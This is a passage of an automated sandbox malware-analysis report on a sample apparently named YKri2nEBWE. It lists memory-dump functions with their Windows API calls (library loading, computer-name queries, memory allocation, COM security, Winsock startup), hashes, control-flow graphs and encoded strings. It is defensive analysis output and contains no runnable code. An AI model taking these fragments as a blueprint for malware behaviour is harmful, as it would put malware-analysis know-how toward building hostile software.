                                                                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                                                                    • Opcode ID: ed4aaa18c661d40e28422755a91097da8ecc7dbbe688700dc29f5297c9686f09
                                                                                                                                                                                                                                    • Instruction ID: beb114da8026abec9efa3a3c70ed9bc155001ae2335f5288120ed8623f1a7f64
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ed4aaa18c661d40e28422755a91097da8ecc7dbbe688700dc29f5297c9686f09
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7A6165356083019BD754AF18C890A3FB3A2EBC5320F29C52CF9958B2A1FB30DD55D79A
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2367129117.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F27000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368008632.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368026396.0000000000F36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_c40000_YKri2nEBWE.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                                                                    • Opcode ID: 29e06580075d088d5039c15e7f7d8c3d17107bcb3e7b48e730c50c088c141a12
                                                                                                                                                                                                                                    • Instruction ID: 23331a0b4a21a891c26a0c1ec205c679defdfa44e8bf834c0654084cf20ee15a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 29e06580075d088d5039c15e7f7d8c3d17107bcb3e7b48e730c50c088c141a12
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 065158B5A083064BD72CAF28C8C072FB7D2ABD5310F19C97DE4999B395EA319D418B85
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2367129117.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_c40000_YKri2nEBWE.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 237503144-0
                                                                                                                                                                                                                                    • Opcode ID: 4642d1aa0b8a58c5912d225180fce4f3bae946e7c987ecd41618bbfc469412a8
                                                                                                                                                                                                                                    • Instruction ID: 92034fbd0255a05f18460cd62b3d33c0bd07b1934ce199186143c238b4d14689
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4642d1aa0b8a58c5912d225180fce4f3bae946e7c987ecd41618bbfc469412a8
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 323130E9B005401BE515B6312CA3A7F3157ABD0718F081428F40B2B387ED75F91AB6E7
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2367129117.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367948363.0000000000F1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F27000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368008632.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368026396.0000000000F36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_c40000_YKri2nEBWE.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: de8a8dcc9c3ab3076e5cd776fb6cd32bc0718f272d39d571d2e216b7fbce9e89
                                                                                                                                                                                                                                    • Instruction ID: 248107abdc0fdb49a102d0432bff710e21bc4b879d0875e1261106ad4c21c4e5
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: de8a8dcc9c3ab3076e5cd776fb6cd32bc0718f272d39d571d2e216b7fbce9e89
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3A21C537A627184BD3108E54DCC87957762E7D9328F3E86B8C9249F3D2C97BA91386C0

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 1123 c6d7ee-c6d7f3 1124 c6d7f5-c6d7f9 1123->1124 1125 c6d813-c6d819 1123->1125 1126 c6d800-c6d809 1124->1126 1127 c6d896-c6dbfb FreeLibrary call c7fe00 1125->1127 1126->1126 1128 c6d80b-c6d80e 1126->1128 1132 c6dc00-c6dc12 1127->1132 1128->1127 1132->1132 1133 c6dc14-c6dc19 1132->1133 1134 c6dc2d 1133->1134 1135 c6dc1b-c6dc1f 1133->1135 1136 c6dc30-c6dc72 GetComputerNameExA 1134->1136 1137 c6dc20-c6dc29 1135->1137 1137->1137 1138 c6dc2b 1137->1138 1138->1136
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 00C6D898
                                                                                                                                                                                                                                    • GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 00C6DC43
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2367129117.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_c40000_YKri2nEBWE.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ComputerFreeLibraryName
                                                                                                                                                                                                                                    • String ID: ;87>
                                                                                                                                                                                                                                    • API String ID: 2904949787-2104535307
                                                                                                                                                                                                                                    • Opcode ID: 3752d9e9f37abf0c842651d4cedd365a45b8f0afe889a7349242200d1a976c38
                                                                                                                                                                                                                                    • Instruction ID: c5a9aa58bd6ba27b219b41f162f7f0497b0d45e3f422462caa6f27bac7877d2c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3752d9e9f37abf0c842651d4cedd365a45b8f0afe889a7349242200d1a976c38
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 102128716047428FEB318F29D890726BFE1AF9B300F188699C4D78B396D7349842C791

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 1186 c49d1e-c49d34 1187 c49d40-c49d52 1186->1187 1187->1187 1188 c49d54-c49d7e 1187->1188 1189 c49d80-c49d92 1188->1189 1189->1189 1190 c49d94-c49e13 LoadLibraryExW call c7d960 1189->1190 1193 c49e20-c49e32 1190->1193 1193->1193 1194 c49e34-c49e5e 1193->1194 1195 c49e60-c49e72 1194->1195 1195->1195 1196 c49e74-c49e80 LoadLibraryExW call c7d960 1195->1196 1198 c49e85-c49e98 1196->1198
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000), ref: 00C49D98
                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000), ref: 00C49E78
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2367129117.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367661684.0000000000E76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367678792.0000000000E7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367695815.0000000000E7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367712406.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367729171.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367746796.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367769950.0000000000E9E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367786833.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367803218.0000000000EA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367820720.0000000000EA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367838500.0000000000EAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367855458.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367873504.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367890292.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367890292.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367948363.0000000000F1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F27000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368008632.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368026396.0000000000F36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_c40000_YKri2nEBWE.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1029625771-0
                                                                                                                                                                                                                                    • Opcode ID: e4d20a7238d63aa2a444cf45cba3e4b7bcb70d8ff81f8181914193c2e978e4b3
                                                                                                                                                                                                                                    • Instruction ID: fd76eb1f4f3c893cca9cc53c727d701f5840f39072f419458b42b817a088ee69
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e4d20a7238d63aa2a444cf45cba3e4b7bcb70d8ff81f8181914193c2e978e4b3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 284125B4D003009FE7149F7899D2A5A7F71FB06324F50429DE4A02F3A6C631580ACBE2
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CoInitializeEx.COMBASE(00000000,00000002), ref: 00C4F09D
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2367129117.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_c40000_YKri2nEBWE.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Initialize
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2538663250-0
                                                                                                                                                                                                                                    • Opcode ID: bad47292b7fba9d22a2fd9dc6be3fa95b20f9db0a950b6b628794607124104c6
                                                                                                                                                                                                                                    • Instruction ID: b9f95dc65a7e59ebde02cd367e90bfedbb7269f482d6dee31e17bbe31ad6d41b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bad47292b7fba9d22a2fd9dc6be3fa95b20f9db0a950b6b628794607124104c6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0C41D8B4910B40AFD370EF3D9A4B7137EB8AB05250F504B1EF9E6866D4E231A4198BD7
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 00C6DD03
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2367129117.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367563170.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367584740.0000000000E4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367606087.0000000000E5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367627589.0000000000E74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367644651.0000000000E75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367661684.0000000000E76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367678792.0000000000E7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367695815.0000000000E7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367712406.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367729171.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367746796.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367769950.0000000000E9E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367786833.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367803218.0000000000EA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367820720.0000000000EA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367838500.0000000000EAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367855458.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367873504.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367890292.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367890292.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367948363.0000000000F1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F27000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368008632.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368026396.0000000000F36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_c40000_YKri2nEBWE.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ComputerName
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3545744682-0
                                                                                                                                                                                                                                    • Opcode ID: 09c12e7750b41d110ef0c03c0d624ff8650e3afc7dce0e70673b554d459bfacb
                                                                                                                                                                                                                                    • Instruction ID: 3fb782c828ecc1ab3343c4949b117db4de9285fdbc195d0e34e2ef41374ba709
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 09c12e7750b41d110ef0c03c0d624ff8650e3afc7dce0e70673b554d459bfacb
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A421A4706047918BD7368F25C4A0732BBE1BF5B304F2895CDD4D38B686CA74A546C762
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • RtlReAllocateHeap.NTDLL(?,00000000), ref: 00C7E0E0
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2367129117.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_c40000_YKri2nEBWE.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                                                    • Opcode ID: 4b2d7dc65152e41be01d2100be6a571439a95e5fb7df954e0ab169fd8edb7953
                                                                                                                                                                                                                                    • Instruction ID: 84f9cf6936683e3ecd26aceb94233e7a4d66673c1a6e473606ae77ee91f77a17
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4b2d7dc65152e41be01d2100be6a571439a95e5fb7df954e0ab169fd8edb7953
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 15F0A032814212FBC2506F38BD05B6B3AA4EFC6720F094479F40896160DA35E816A691
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00C4ECA3
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2367129117.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_c40000_YKri2nEBWE.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: InitializeSecurity
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 640775948-0
                                                                                                                                                                                                                                    • Opcode ID: 76efde0fde24d89822f38d2f679188599fb7cca3190c6da17d848075b8a2f4ec
                                                                                                                                                                                                                                    • Instruction ID: a3ea7866f7e686d8f6b009c5fd25a612d1dd25b44af2c3298511b934c894c128
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 76efde0fde24d89822f38d2f679188599fb7cca3190c6da17d848075b8a2f4ec
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 38E092343DA3427AF63986259C63F6931165B42F29E306705B3253E3D4CAD07101824C
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2367129117.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_c40000_YKri2nEBWE.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: BlanketProxy
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3890896728-0
                                                                                                                                                                                                                                    • Opcode ID: fb9685c72c8902a68bb964f1500057c03aea04cb0041f3df924c03909c8680cd
                                                                                                                                                                                                                                    • Instruction ID: 4038dd9d4d3e2a6933c34e48ea76879522f14bcb3f1c458608b2c445778960e5
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fb9685c72c8902a68bb964f1500057c03aea04cb0041f3df924c03909c8680cd
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4BF0DAB4109701CFE354DF28D1A471ABBF0FB89704F10884CE4968B3A0CB75AA48CF82
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2367129117.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_c40000_YKri2nEBWE.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: BlanketProxy
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3890896728-0
                                                                                                                                                                                                                                    • Opcode ID: d98eb6917e3e999d75c5b6f2f262c9ce68935c11b7e8b404c2466a9e617f1178
                                                                                                                                                                                                                                    • Instruction ID: cd7e8e7e8130adb1529c3cd1571839ffc5ec1c492ca90d7b438fa450449222ef
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d98eb6917e3e999d75c5b6f2f262c9ce68935c11b7e8b404c2466a9e617f1178
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E2F07A745083418FD314DF24C5A871BBBE0BB84308F00891DE5998B390C7B59549CF82
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • WSAStartup.WS2_32(00000202,?), ref: 00C49ED2
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2367129117.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_c40000_YKri2nEBWE.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Startup
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 724789610-0
                                                                                                                                                                                                                                    • Opcode ID: fd7e634f11a28daabc9b3537296c80c64402d91f5129040d0f74c2fee1c5dd16
                                                                                                                                                                                                                                    • Instruction ID: 16f0e2980a6cac58f8af72d9779b137ad1f63dbffe0f86baf77d449a20da3a97
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fd7e634f11a28daabc9b3537296c80c64402d91f5129040d0f74c2fee1c5dd16
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BFE02B336406029BE700DB30FC47F8D3356DB15342705C42DE109C2072EAB294209B10
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • RtlFreeHeap.NTDLL(?,00000000,?,00C7E0F9), ref: 00C7C590
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2367129117.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_c40000_YKri2nEBWE.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FreeHeap
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3298025750-0
                                                                                                                                                                                                                                    • Opcode ID: feb245825f8e499490edfd3d700a6ee50b551efd4945eea7caeb5c1f69bab145
                                                                                                                                                                                                                                    • Instruction ID: c13878b9f3c7d9fc03b8a5dc46285a9de45e142af928b3c9c2c5a1a04be02f8f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: feb245825f8e499490edfd3d700a6ee50b551efd4945eea7caeb5c1f69bab145
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 12D01232415132FBCA506F28BC06BDB3B54DF49321F074891F5446A474D735EC91DAD4
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(?,00000000), ref: 00C7C561
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2367129117.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_c40000_YKri2nEBWE.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                                                    • Opcode ID: 92ea219b9e3ffca40b26936556323fc0e27c48b6ba1c74ca7ff5741826dd8584
                                                                                                                                                                                                                                    • Instruction ID: bc431d8eeb212588d788f5ce5cf9f52fe13533dd669941e2da11921935a8e667
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 92ea219b9e3ffca40b26936556323fc0e27c48b6ba1c74ca7ff5741826dd8584
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 22A00171184150AADA562B24BC09BC87A21AB58621F124192F141994B6866198929A84
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000), ref: 00C99EC7
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2367181956.0000000000C95000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_c40000_YKri2nEBWE.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                                                                                                                    • Opcode ID: 665669b4b81937127b290555bb1e5be54b398af90a618f353bfc008e87b4d7e2
                                                                                                                                                                                                                                    • Instruction ID: d0b0b908d196872323bff84d6428999eaf199998a69815f768a94e3ab3c0457d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 665669b4b81937127b290555bb1e5be54b398af90a618f353bfc008e87b4d7e2
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0BF030B121C700DFDB045F269885A7EBBE4FB44310F61042EE6C986790DB7158809A57
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000), ref: 00C99C34
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2367181956.0000000000C95000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_c40000_YKri2nEBWE.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                                                                                                                    • Opcode ID: 73bb2fb786585b4588ec2c7d4e8f9f258de88db5171c7479882fb54a7ebc0b7f
                                                                                                                                                                                                                                    • Instruction ID: d98689fd4cae9e1ec01de675dc80f0310e889a60a374b991b81d09e68d52ca2b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 73bb2fb786585b4588ec2c7d4e8f9f258de88db5171c7479882fb54a7ebc0b7f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 54D09E7404864DCFCF40AF75844C1AD7AE0FF05361F550A1CE8AA86684D7751C50DA1A
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2367129117.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_c40000_YKri2nEBWE.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: *,-"$3F&D$JyTK$ntxE$pt}w$qRb`$t~v:$uqrs$w}MI${zdy$~mfQ$L4$L4
